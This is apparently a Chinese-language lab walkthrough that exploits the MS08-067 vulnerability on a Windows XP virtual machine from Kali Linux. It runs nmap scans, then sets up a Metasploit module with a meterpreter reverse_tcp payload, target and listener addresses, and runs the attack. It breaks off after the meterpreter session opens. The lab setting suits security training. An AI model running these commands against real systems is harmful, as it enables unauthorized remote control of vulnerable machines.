一、准备工作
工具环境:kali 下载安装
靶场环境:windows xp
1.kali切换到root权限。有两种方式:直接切换到管理员权限,这种方式虽然比较方便,但是也比较危险,root权限很大,如果有误操作会产生较大的影响;当某些操作需要管理员权限时,临时提权,该操作结束后,恢复普通用户权限。推荐第二种方发
sudo su #切换到管理员权限下
sudo ifconfig #临时对ifconfig操作提权
2.将kali和靶场winXP设置到同一局域网下,将二者的网络适配器均设置为 仅主机模式。
操作:选中--右键--设置--仅主机模式
查看设置后二者是否在同一局域网下
kali命令
ifconfig
winXP命令
ipconfig
二、实验操作
kali中:
msfconsole
nmap -F 192.168.92.0/24 #快速扫描该网段
nmap -T 4 -A 192.168.92.130 #深入扫描该网段中存活的主机
nmap -O 192.168.92.130 #查看OS相关
扫描结果可以看出:winXP版本符合,漏洞对应的端口也是开放的,所以可以断定有可能利用该漏洞。实际中,此时会进行一个语言,自己搭建一个靶场环境,模拟攻击,以便提高真实攻击的成功率。
search ms08-067 #查看是否有该漏洞的信息
use 0 #利用库中的攻击代码
show options #查看参数
#需要补全参数
set PAYLOAD windows/meterpreter/reverse_tcp
show options #查看需要补全的参数
set RHOSTS 192.168.92.130 #设置攻击目标
set LHOST 192.168.92.129 #设置监听主机
show options #查看设置好的参数,确定一下
run #执行攻击,返回session视为成功
现在到meterpeter中
help #查看命令
进入对方的文件系统